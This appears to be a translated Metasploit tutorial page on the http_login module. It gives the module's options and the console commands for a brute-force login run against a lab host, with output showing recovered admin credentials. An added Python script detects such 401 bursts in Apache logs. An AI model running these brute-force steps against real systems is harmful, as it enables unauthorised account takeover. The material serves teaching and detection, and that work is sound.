Http/http login
From www.metasploit-es.com.ar
The "http_login" module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication.
    msf > use auxiliary/scanner/http/http_login
    msf auxiliary(http_login) > show options

    Module options (auxiliary/scanner/http/http_login):

       Name              Current Setting                                                 Required  Description
       ----              ---------------                                                 --------  -----------
       AUTH_URI                                                                          no        The URI to authenticate against (default:auto)
       BLANK_PASSWORDS   true                                                            yes       Try blank passwords for all users
       BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
       PASSWORD                                                                          no        A specific password to authenticate with
       PASS_FILE         /opt/metasploit3/msf3/data/wordlists/http_default_pass.txt      no        File containing passwords, one per line
       Proxies                                                                           no        Use a proxy chain
       RHOSTS                                                                            yes       The target address range or CIDR identifier
       RPORT             80                                                              yes       The target port
       STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
       THREADS           1                                                               yes       The number of concurrent threads
       USERNAME                                                                          no        A specific username to authenticate as
       USERPASS_FILE     /opt/metasploit3/msf3/data/wordlists/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
       USER_FILE         /opt/metasploit3/msf3/data/wordlists/http_default_users.txt     no        File containing users, one per line
       UserAgent         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)              yes       The HTTP User-Agent sent in the request
       VERBOSE           true                                                            yes       Whether to print output for all attempts
       VHOST                                                                             no        HTTP server virtual host
To configure the module, we set the AUTH_URI parameter to the path of the page that requests authentication, set our RHOSTS value and, to reduce the output, set VERBOSE to false.
    msf auxiliary(http_login) > set AUTH_URI /xampp/
    AUTH_URI => /xampp/
    msf auxiliary(http_login) > set RHOSTS 192.168.1.201
    RHOSTS => 192.168.1.201
    msf auxiliary(http_login) > set VERBOSE false
    VERBOSE => false
    msf auxiliary(http_login) > run

    [*] Attempting to login to http://192.168.1.201:80/xampp/ with Basic authentication
    [+] http://192.168.1.201:80/xampp/ - Successful login 'admin' : 's3cr3t'
    [*] http://192.168.1.201:80/xampp/ - Random usernames are not allowed.
    [*] http://192.168.1.201:80/xampp/ - Random passwords are not allowed.
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(http_login) >
As we can see in the output above, our scan has found a valid set of credentials for the directory.
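The following added example, which is not part of the original page or of Metasploit, shows how a scan like the one above appears from the server side: it flags bursts of 401 responses against one path in an access log and reports the account that logged in successfully afterwards. It assumes Apache "combined" log format; the function name, threshold, window, source addresses and log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')

def detect_basic_auth_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """One finding per (client IP, path) that draws >= threshold 401s within window."""
    failures = defaultdict(list)  # (ip, path) -> timestamps of recent 401 responses
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        key = (m["ip"], m["path"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        status = int(m["status"])
        if status == 401:
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold and key not in findings:
                findings[key] = {"ip": m["ip"], "path": m["path"], "agent": m["agent"],
                                 "alert_time": ts, "guessed_user": None}
        elif key in findings and status < 400 and m["user"] != "-":
            # Authenticated success after the burst: this account's password was guessed.
            findings[key]["guessed_user"] = findings[key]["guessed_user"] or m["user"]
    return list(findings.values())

# Constructed sample log (not from the page): a burst against /xampp/ plus one normal login.
AGENT = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
ROW = '{ip} - {user} [10/Mar/2024:09:15:{sec:02d} +0000] "GET /xampp/ HTTP/1.1" {st} 512 "-" "{ua}"'
SAMPLE_LOG = [ROW.format(ip="192.0.2.10", user=u, sec=i, st=401, ua=AGENT)
              for i, u in enumerate(["root", "admin", "guest", "test", "xampp", "admin"])]
SAMPLE_LOG += [
    ROW.format(ip="192.0.2.10", user="admin", sec=6, st=200, ua=AGENT),
    ROW.format(ip="192.0.2.77", user="-", sec=20, st=401, ua="Mozilla/5.0"),
    ROW.format(ip="192.0.2.77", user="alice", sec=25, st=200, ua="Mozilla/5.0"),
]

if __name__ == "__main__":
    for f in detect_basic_auth_guessing(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']}: 401 burst, UA={f['agent']!r}, "
              f"guessed account={f['guessed_user']}")
```

The User-Agent is recorded only as context: it is a configurable option of the module, so the alert keys on the 401 burst rather than on that string.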
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999